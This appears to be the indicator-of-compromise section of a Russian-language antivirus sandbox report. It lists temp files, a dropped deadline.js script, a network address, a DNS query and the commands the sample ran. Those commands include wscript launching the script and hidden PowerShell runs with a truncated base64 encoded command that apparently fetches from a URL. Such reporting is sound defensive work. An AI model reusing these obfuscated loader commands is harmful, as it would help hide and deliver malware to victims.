Техническая информация
- %TEMP%\mz_etilqs_xxssah8y9ppjel8
- %TEMP%\mz_etilqs_ynnynwdvz0wozd5
- %TEMP%\mz_etilqs_iz90czonbkjp1sv
- %ALLUSERSPROFILE%\deadline.js
- %TEMP%\mz_etilqs_hunswrkwolo63gd
- %TEMP%\mz_etilqs_tomd3ycipwiue7g
- %TEMP%\mz_etilqs_cg10hwwitx9c3jq
- '35.##1.9.150':443
- DNS ASK fe########alog-cdn.prod.mozaws.net
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\Deadline.js" renewal SubstantiatedFallers
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\Deadline.js" renewal SubstantiatedFallers' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encodedcommand "JABIAHkAcABlAHIAcAB5AHIAZQB4AGkAYQBLAGkAbABvAGIAeQB0AGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAGwAQQBIAE0AQQBZAHcAQgB5AEEARwBrAEEA...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encodedcommand "JABIAHkAcABlAHIAcAB5AHIAZQB4AGkAYQBLAGkAbABvAGIAeQB0AGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAGwAQQBIAE0AQQBZAHcAQgB5AEEARwBrAEEA...